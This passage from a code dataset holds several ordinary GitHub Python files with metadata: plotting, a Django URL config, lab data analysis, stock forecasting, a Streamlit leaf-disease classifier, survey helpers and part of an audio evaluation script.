%s %s\" % (\"Figures/order0.pdf\", \"Figures/order0.pdf\"))\nplt.show()\n\nmesh.reorder_hilbert()\nplt.figure(figsize=(6,6))\nneighbours = mesh.neighbours\ncentroids = mesh.x.mean(axis=1)\nplt.triplot(mesh.xnodes[:, 0], mesh.xnodes[:, 1], mesh.triangles[:mesh.n_triangles], color=\"k\", lw=1, alpha=0.9)\nfor i in range(nt-1):\n plt.plot(centroids[i:i+2,0], centroids[i:i+2,1], '.-', lw=1, alpha=1, c=color[i])\nplt.gca().set_aspect(1)\nplt.gca().axis(\"off\")\nplt.savefig(\"Figures/orderh.pdf\")\nos.system(\"pdfcrop %s %s\" % (\"Figures/orderh.pdf\", \"Figures/orderh.pdf\"))\nplt.show()\n\n\n# %%\n", "repo_name": "MiguelDLC/plottools", "sub_path": "stommesh.py", "file_name": "stommesh.py", "file_ext": "py", "file_size_in_byte": 1831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, 
{"api_name": "slim4.mpi_rank", "line_number": 21, "usage_type": "call"}, {"api_name": "slim4.mpi_size", "line_number": 22, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu.get_node_rank", "line_number": 23, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu", "line_number": 23, "usage_type": "name"}, {"api_name": "slim4.slimcl.cu.get_node_size", "line_number": 24, "usage_type": "call"}, {"api_name": "slim4.slimcl.cu", "line_number": 24, "usage_type": "name"}, {"api_name": "slim4.slim2d.partition_mesh", "line_number": 26, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 26, "usage_type": "name"}, {"api_name": "slim4.slim2d.Mesh", "line_number": 27, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 29, "usage_type": "call"}, {"api_name": "slim4.slim2d.Mesh", "line_number": 30, "usage_type": "call"}, {"api_name": "slim4.slim2d", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.cm.get_cmap", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.triplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.triplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "os.system", "line_number": 58, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "11608723102", "text": "# -*- coding: utf-8 -*-\n# @Time : 2019/11/29 14:25\n# @Author : XiaTian\n# @File : urls.py\n\nfrom django.urls import path\nfrom Login import views\n\nurlpatterns = [\n path('register/', views.RegisterView.as_view()),\n path('login', views.LoginView.as_view()),\n path('test_auth', views.TestView.as_view()),\n]", "repo_name": "summer5625/Mygit", "sub_path": "第九模块_vue和路飞学城/luffy_city/luffy_project/Login/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "Login.views.RegisterView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "Login.views.RegisterView", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "Login.views.LoginView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "Login.views.LoginView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "Login.views.TestView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "Login.views.TestView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Login.views", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "28529899279", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom uncertainties import ufloat\r\nimport uncertainties.unumpy as unp\r\nimport scipy as scp\r\n\r\ntemp, t_oben, t_unten = np.genfromtxt(\"Messdaten_grKu_steigendeTemp.txt\", unpack=True)\r\nn=10\r\nartm_t_oben =np.zeros(n) #arithmetische Mittel\r\nartm_t_unten =np.zeros(n)\r\nsdev_t_oben =np.zeros(n) #standardabweichungen \r\nsdev_t_unten =np.zeros(n)\r\nsingle_temp =np.zeros(n) #array mit Temperaturen, aber jede Temperatur nur einmal\r\n\r\nfor j in range(n):\r\n for i, temperature in enumerate(temp):\r\n\r\n if i==2*j and temp[i] == temp[i+1]:\r\n artm_t_oben[j] = (t_oben[i] + t_oben[i+1])/2\r\n artm_t_unten[j] = (t_unten[i] + t_unten[i+1])/2\r\n sdev_t_oben[j] = np.std(t_oben[j:j+2])\r\n sdev_t_unten[j] = np.std(t_unten[j:j+2])\r\n single_temp[j]= temp[i]\r\n\r\n# Hier werden paarweise die Mittewerte von den \"oben\" und den \"unten\" Messwerten berechnet\r\n\r\nprint(\"artm_t_oben \",artm_t_oben)\r\nprint(\"artm_t_unten\",artm_t_unten)\r\nprint(\"sdev_t_oben \",sdev_t_oben)\r\nprint(\"sdev_t_unten\",sdev_t_unten)\r\nprint(\"single_temp\",single_temp)\r\n\r\nnp.savetxt('Messreihe3.txt', np.column_stack([artm_t_oben, artm_t_unten, sdev_t_oben, sdev_t_unten]), header=\"artm_t_oben artm_t_unten sdev_t_oben sdev_t_unten\")\r\n\r\nunc_t_oben = unp.uarray(artm_t_oben, sdev_t_oben)\r\nunc_t_unten = unp.uarray(artm_t_unten, sdev_t_unten)\r\n\r\n\r\nplt.errorbar(single_temp, artm_t_oben, yerr=sdev_t_oben, fmt='x', label=r'Laufzeiten oben')\r\nplt.errorbar(single_temp, artm_t_unten, yerr=sdev_t_unten, fmt='x', label=r'Laufzeiten unten')\r\n\r\nplt.ylabel(\"t / \\\\unit{{\\\\s}}\")\r\nplt.xlabel(\"T / 
\\\\unit{{\\\\celsius}}\")\r\nplt.savefig(\"build/Messreihe3.pdf\")\r\n### Berechnungen eta nach Temperatur und Plot dafür ###", "repo_name": "Enno-Enno/PraktikumWS2223", "sub_path": "01_v207/Messreihe3.py", "file_name": "Messreihe3.py", "file_ext": "py", "file_size_in_byte": 1763, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 33, "usage_type": "call"}, {"api_name": "uncertainties.unumpy.uarray", "line_number": 35, "usage_type": "call"}, {"api_name": "uncertainties.unumpy", "line_number": 35, "usage_type": "name"}, {"api_name": "uncertainties.unumpy.uarray", "line_number": 36, "usage_type": "call"}, {"api_name": "uncertainties.unumpy", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.errorbar", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.errorbar", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "3576124945", "text": "# Adapted from: https://www.kaggle.com/code/ryanholbrook/forecasting-with-machine-learning/tutorial\nfrom pathlib import Path\n\nimport plotly.graph_objects as go\nfrom plotly.colors import n_colors\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression, MultiTaskLasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom xgboost import XGBRegressor\nfrom joblib import dump, load\n\ndef create_visualization(y_test:pd.DataFrame, y_pred: pd.DataFrame) -> go.Figure:\n fig = go.Figure()\n\n colorscale = n_colors('rgb(67, 198, 172)', 'rgb(25, 22, 84)', len(y_pred), colortype='rgb')\n\n for i, (index, row) in enumerate(y_pred.iterrows()):\n fig.add_trace(go.Scatter(x=pd.period_range(start=index, periods=len(row)).to_timestamp(), y=row, line=dict(color=colorscale[i])))\n fig.add_trace(go.Scatter(x=y_test.index, y=y_test.y_step_1, line=dict(color='black')))\n fig.update_layout(showlegend=False)\n \n return fig\n\n\napple_stock = pd.read_csv(\"./finance/apple.csv\", index_col='Date')\napple_stock.index = pd.to_datetime(apple_stock.index)\napple_stock.sort_index(inplace=True)\n\ndef make_lags(ts, lags, lead_time=1):\n return pd.concat(\n {\n f'y_lag_{i}': ts.shift(i)\n for i in range(lead_time, 
lags + lead_time)\n },\n axis=1)\n\n# Thirty days of lag features\ny = apple_stock.Close.copy()\nX = make_lags(y, lags=30).fillna(0.0)\n\n\ndef make_multistep_target(ts, steps):\n return pd.concat(\n {f'y_step_{i + 1}': ts.shift(-i)\n for i in range(steps)},\n axis=1)\n\n\n# 7 Day forecast\ny = make_multistep_target(y, steps=7).dropna()\n\n# Shifting has created indexes that don't match. Only keep times for\n# which we have both targets and features.\ny, X = y.align(X, join='inner', axis=0)\n\n# Create splits\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, shuffle=False)\n\n\n### Model 1: Basic Direct LinReg\nmodel = LinearRegression()\nmodel.fit(X_train, y_train)\ndump(model, './finance/dir_linreg.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n\n### Model 2: Basic Direct Lasso\nmodel = MultiTaskLasso()\nmodel.fit(X_train, y_train)\ndump(model, './finance/dir_lasso.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n\n### Model 3: DirRec XGBoost\nfrom sklearn.multioutput import RegressorChain\n\nmodel = RegressorChain(XGBRegressor())\nmodel.fit(X_train, y_train)\ndump(model, './finance/dirrec_xgb.joblib')\n\ny_fit = pd.DataFrame(model.predict(X_train), index=X_train.index, columns=y.columns)\ny_pred = pd.DataFrame(model.predict(X_test), index=X_test.index, columns=y.columns)\n\ntrain_rmse = mean_squared_error(y_train, y_fit, squared=False)\ntest_rmse = mean_squared_error(y_test, y_pred, squared=False)\nprint((f\"Train RMSE: {train_rmse:.2f}\\n\" f\"Test RMSE: {test_rmse:.2f}\"))\n\ncreate_visualization(y_train, y_fit).show()\ncreate_visualization(y_test, y_pred).show()\n\n# How to use XGBoost for stock prediction: https://www.kaggle.com/code/mtszkw/xgboost-for-stock-trend-prices-prediction\n\n\n", "repo_name": "TechClubHSG/Fall22_PG_DSCS_How_to_Streamlit", "sub_path": "finance/finance.py", "file_name": "finance.py", "file_ext": "py", "file_size_in_byte": 3868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 15, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 15, "usage_type": "name"}, {"api_name": "plotly.colors.n_colors", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "pandas.period_range", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 21, 
"usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 21, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 14, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 63, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.linear_model.MultiTaskLasso", "line_number": 79, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.multioutput.RegressorChain", "line_number": 97, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 97, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "9986432520", "text": "import streamlit as st\nimport tensorflow as tf\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nst.set_page_config(\n page_title=\"Classification of Potato Leaf using the Leaves\",\n layout=\"wide\" # Add this line to enable the dark theme\n)\n\nhide_streamlit_style = \"\"\"\n <div style=\"background:#000000 ;padding:10px\">\n <h2 style=\"color:white;text-align:center;\"> Potato Leaf Disease Detection</h2>\n </div>\n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\nst.set_option('deprecation.showfileUploaderEncoding', False)\n@st.cache_resource\ndef load_model():\n model=tf.keras.models.load_model('potato_leaf_detection.h5')\n return model\n\nwith st.spinner('Model is being loaded..'):\n model=load_model()\n\nst.write(\"\"\"\n # The Potato Leaf can be classified as:\n ### Early Blight\n ### Healthy\n ### Late Blight\n \"\"\"\n )\n# st.write(\n# \"\"\"\n# ### Early Blight\n# ### Healthy\n# ### Late Blight\n# \"\"\"\n# )\n\ndef is_image(file):\n try:\n img = Image.open(file)\n img.verify() # Check if the file is a valid image\n return True\n except:\n return False\n\ndef is_leaf_image(image_data):\n try:\n img = Image.open(image_data)\n img.verify() # Check if the image is valid\n return np.any(np.array(img)) # Check if the 
image contains any pixels\n except:\n return False\n\nfile = st.file_uploader(\"\", type=[\"jpg\", \"png\", \"jpeg\", \"heic\"])\n\ndef import_and_predict(image_data, model):\n size = (256,256)\n image = ImageOps.fit(image_data, size, Image.ANTIALIAS)\n img = np.asarray(image)\n img_reshape = img[np.newaxis,...]\n prediction = model.predict(img_reshape)\n return prediction\n\nif file is None:\n st.text(\"Please upload an image file\")\nelse:\n if is_image(file):\n if is_leaf_image(file):\n image = Image.open(file)\n st.image(image, use_column_width=True)\n predictions = import_and_predict(image, model)\n class_names = ['Early blight', 'Late blight', 'Healthy']\n\n st.write(\"Prediction Results:\")\n for i, class_name in enumerate(class_names):\n probability = predictions[0][i]\n confidence = probability * 100\n st.write(f\"{class_name}: {confidence:.2f}%\")\n\n predicted_class_index = np.argmax(predictions[0])\n predicted_class = class_names[predicted_class_index]\n st.write(f\"Prediction: {predicted_class} with confidence {predictions[0][predicted_class_index] * 100:.2f}%\")\n if predicted_class == 'Healthy':\n st.success(\"Classified as Healthy\")\n else:\n st.warning(f\"Classified as {predicted_class}\")\n else:\n st.warning(\"Not a leaf image! Please upload an image of a leaf.\")\n else:\n st.warning(\"Not a valid image file! Please upload an image (jpg, png, jpeg, or heic).\")\n\ntemp = \"\"\"\"\"\"\nst.markdown(temp, unsafe_allow_html=True)\n", "repo_name": "Karthikkolli17/potatoMotato", "sub_path": "potatoApp.py", "file_name": "potatoApp.py", "file_ext": "py", "file_size_in_byte": 3048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.set_option", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "streamlit.cache_resource", "line_number": 18, "usage_type": "attribute"}, {"api_name": "streamlit.spinner", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.any", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageOps.fit", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 61, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "streamlit.text", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, 
{"api_name": "streamlit.image", "line_number": 73, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 77, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 83, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 87, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 93, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "5418401038", "text": "import pandas as pd\nimport numpy as np\nfrom collections import defaultdict\n\ndf = pd.read_csv('data/survey_results_public.csv')\nschema = pd.read_csv('data/survey_results_schema.csv')\n\ndef get_description(column_name, schema=schema):\n '''\n INPUT - schema - pandas dataframe with the schema of the developers survey\n column_name - string - the name of the column you would like to know about\n OUTPUT -\n desc - string - the description of the column\n '''\n desc = list(schema[schema['Column'] == column_name]['Question'])[0]\n return desc\n\n#Question 3\ndef total_count(col1, col2, look_for, df=df):\n '''\n INPUT:\n df - the pandas dataframe you want to search\n col1 - the column name you want to look through\n col2 - the column you want to count values from\n look_for - a list of strings you want to search for in each row of df[col]\n OUTPUT:\n new_df - a dataframe of each look_for with the count of how often it shows up\n '''\n new_df = defaultdict(int)\n #loop through list of ed types\n for val in look_for:\n #loop through rows\n for idx in range(df.shape[0]):\n #if the ed type is in the row add 1\n if val in df[col1][idx]:\n new_df[val] += int(df[col2][idx])\n new_df = pd.DataFrame(pd.Series(new_df)).reset_index()\n new_df.columns = [col1, col2]\n new_df.sort_values('count', ascending=False, inplace=True)\n return new_df\n\n\ndef create_dummy_df(df, cat_cols, dummy_na):\n '''\n INPUT:\n df - pandas dataframe with categorical variables you want to dummy\n cat_cols - list of strings that are associated with names of the categorical columns\n dummy_na - Bool holding whether you want to dummy NA vals of categorical columns or not\n\n OUTPUT:\n df - a new dataframe that has the following characteristics:\n 1. contains all columns that were not specified as categorical\n 2. removes all the original columns in cat_cols\n 3. dummy columns for each of the categorical columns in cat_cols\n 4. if dummy_na is True - it also contains dummy columns for the NaN values\n 5. 
Use a prefix of the column name with an underscore (_) for separating\n '''\n for col in cat_cols:\n try:\n # for each cat add dummy var, drop original column\n df = pd.concat([df.drop(col, axis=1), pd.get_dummies(df[col], prefix=col, prefix_sep='_', drop_first=True, dummy_na=dummy_na)], axis=1)\n except:\n continue\n return df\n", "repo_name": "wbagais/Stack_Overflow_Developer_Survey_2017", "sub_path": "helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 2539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "8433891035", "text": "from extract.readDB import DBReader\nfrom typing import List, Iterator, Tuple\nimport random\nfrom . import evaluate\nimport numpy as np\nimport os\nfrom os.path import join\nimport soundfile\nimport sys\nimport functools\nfrom extract.util import load_config, invert_channel\nfrom extract.feature import Audio\nfrom extract.readDB import loadDBReader, DBReader, swap_speaker, read_conversations, orig_noise_filter\n\nmin_truth_bcs = 3\nmonologue_length = 15\nthreshold = 0.62\n# blacklist because some have a lot of leaking between channels or bad quality\nblacklist = \"sw2193\".split(\",\")\n\n\ndef all_mono_segs(reader: DBReader, convs: List[str], min_truth_bcs):\n for conv in convs:\n if conv in blacklist:\n continue\n for channel in [\"A\", \"B\"]:\n convchannel = f\"{conv}-{channel}\"\n bcchannel = f\"{conv}-{invert_channel(channel)}\"\n for start, end in evaluate.get_monologuing_segments(reader, convchannel, monologue_length):\n bcs = [bc for (bc, bcInfo) in reader.get_backchannels(list(reader.get_utterances(bcchannel))) if\n float(bcInfo['from']) >= start and float(bcInfo['to']) <= end]\n if len(bcs) >= min_truth_bcs:\n yield conv, channel, convchannel, start, end\n\n\nfmt = \"wav\"\nconvFmt = \"mp3\"\n\n\ndef write_convert(fname, data, sample_rate, downmix: bool, convFmt: str):\n import subprocess, os.path\n if downmix:\n data = np.sum(data, axis=1, dtype='int16')\n soundfile.write(fname, data, sample_rate)\n if convFmt is not None:\n outname = os.path.splitext(fname)[0] + \".\" + convFmt\n subprocess.call(['ffmpeg', '-y', '-loglevel', 'panic', '-i', fname, '-c:a', 'libmp3lame', '-q:a', '3', outname])\n\ndef add_bc_to_audio_track(output_audio: Audio, start_index: int, bcs: List[Tuple[str, dict, float, Audio]]):\n bc, bcInfo, bc_start_offset, bc_audio = random.choice(bcs)\n audio_len_samples = bc_audio.shape[0]\n if start_index < 0:\n return\n if start_index + audio_len_samples > output_audio.shape[0]:\n audio_len_samples = output_audio.shape[0] - start_index\n output_audio[start_index:start_index + audio_len_samples] += bc_audio[0: audio_len_samples]\n return audio_len_samples\n\ndef get_bc_audio(reader: DBReader, total_length_audio_index: int, bcs: List[Tuple[str, dict, float, Audio]],\n predictions: Iterator[float]):\n output_audio = Audio(np.zeros(total_length_audio_index, dtype='int16'), sample_rate_hz=bcs[0][3].sample_rate_hz)\n\n for 
peak_s in predictions:\n # audio_len_s = reader.features.sample_index_to_time(bc_audio, audio_len_samples)\n start_s = peak_s - 0\n start_index = output_audio.time_to_sample_index(start_s)\n add_bc_to_audio_track(output_audio, start_index, bcs)\n\n return output_audio\n\n\nwant_margin = (-0.2, 0.2)\n\n\ndef write_wavs(reader: DBReader, convs: List[str], count_per_set: int, net_version: str, bc_sample_tracks,\n write_mono=True,\n write_orig=True,\n write_nn=True,\n write_truthrandom=True,\n write_random=True,\n downmix=False\n ):\n all = list(all_mono_segs(reader, convs, min_truth_bcs))\n print(f\"found {len(all)} fitting monologue segments of at least {monologue_length}s with ≥ {min_truth_bcs} bcs\")\n if count_per_set < len(all):\n random.shuffle(all)\n count = 0\n maxamplitudeOrig = 0.5\n maxamplitudeBC = 0.5\n for conv, channel, convchannel, start, end in all:\n if count == count_per_set:\n return\n out_dir = join(\"evaluate\", \"out\", net_version)\n os.makedirs(out_dir, exist_ok=True)\n print(f\"evaluating conv {convchannel} ({start}s-{end}s)\")\n _orig_audio = reader.features.get_adc(convchannel)\n\n start_inx = _orig_audio.time_to_sample_index(start)\n end_inx = _orig_audio.time_to_sample_index(end)\n # minlen = min(_orig_audio.size, nn_bc_audio.size)\n orig_audio = evaluate.normalize_audio(_orig_audio[start_inx:end_inx], maxamplitude=maxamplitudeOrig)\n\n bcconvchannel = f\"{conv}-{invert_channel(channel)}\"\n if write_mono:\n out_dir2 = join(out_dir, \"mono\")\n os.makedirs(out_dir2, exist_ok=True)\n write_convert(join(out_dir2, f\"{conv}{channel} @{start:.2f}s.{fmt}\"),\n orig_audio, 8000, downmix=False, convFmt=None)\n if write_nn or write_truthrandom or write_random:\n bc_sampletrack = None\n bcs = []\n while len(bcs) < 5:\n bc_sampletrack = random.choice(bc_sample_tracks)\n bcs = list(get_boring_bcs(config_path, bc_sampletrack))\n bcs = list(bcs_to_samples(reader, bcs))\n print(f\"with bc samples from {bc_sampletrack}\")\n if write_nn:\n out_dir2 = join(out_dir, \"nn\")\n os.makedirs(out_dir2, exist_ok=True)\n\n bctrack = bc_sampletrack.replace(\"-\", \"\")\n eval_conf = evaluate.get_best_eval_config(config_path, 